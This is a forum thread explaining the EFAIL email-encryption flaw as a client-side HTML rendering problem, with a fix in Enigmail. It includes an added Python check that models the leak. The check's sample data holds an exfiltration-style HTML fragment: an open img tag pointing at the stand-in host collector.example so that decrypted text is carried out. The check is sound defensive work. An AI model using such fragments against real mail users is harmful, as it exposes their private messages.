Critical vulnerabilities in PGP/GPG and S/MIME email encrypt


Re: Critical vulnerabilities in PGP/GPG and S/MIME email enc

Post by Sicro »

This statement is wrong. The vulnerability exists in the email clients, which don't process HTML emails correctly. The decrypted email text is interpreted by the email clients as part of a URL pointing to an image, and when fetching this URL, the server that is contacted for it gets the URL with the decrypted email text. The encryption is therefore not cracked.

A new version of the add-on "Enigmail" for Thunderbird has already been released, which closes this vulnerability. A fix from the Thunderbird developers would have taken longer, so the Enigmail developers did the fix.

HTML emails are usually bad in view of security. People who had disabled the display of HTML emails in their email client were not affected by this vulnerability.
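
Added example (not part of the original posts, and not Enigmail's or Thunderbird's code): a Python check that reproduces the rendering flaw described above on a constructed message and reports any remote image URL that would carry decrypted text. The function names, the host `collector.example` and the sample parts are assumptions made for illustration; parsing each part as its own document is shown as one way to avoid the leak, not as the fix Enigmail shipped.

```python
from html.parser import HTMLParser


class RemoteImageCollector(HTMLParser):
    """Collects the src of every <img> that points at a remote host."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        for name, value in attrs:
            if name == "src" and value and value.startswith(("http://", "https://")):
                self.urls.append(value)


def remote_image_urls(html):
    """Return the remote image URLs a renderer would fetch for this document."""
    collector = RemoteImageCollector()
    collector.feed(html)
    collector.close()
    return collector.urls


def leaking_urls(parts, isolate):
    """parts: list of (html_text, was_encrypted) tuples, already decrypted.

    isolate=False models the flawed behaviour: all parts are joined into one
    HTML document before parsing. isolate=True parses each part on its own.
    Returns the remote image URLs that contain text from a decrypted part.
    """
    if isolate:
        documents = [text for text, _ in parts]
    else:
        documents = ["".join(text for text, _ in parts)]
    secrets = [text.strip() for text, encrypted in parts if encrypted]
    urls = [url for doc in documents for url in remote_image_urls(doc)]
    return [url for url in urls if any(secret in url for secret in secrets)]


# Constructed sample: an unencrypted part that leaves an image URL open,
# the decrypted body, and an unencrypted part that closes the attribute.
SAMPLE_PARTS = [
    ('<img src="http://collector.example/', False),
    ("Meeting moved to 14:00", True),
    ('">', False),
]

if __name__ == "__main__":
    print("joined:  ", leaking_urls(SAMPLE_PARTS, isolate=False))
    print("isolated:", leaking_urls(SAMPLE_PARTS, isolate=True))
```
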

Re: Critical vulnerabilities in PGP/GPG and S/MIME email enc

Post by NicTheQuick »

In fact, Thunderbird was not affected with unchanged settings because it never loads external resources without asking you first.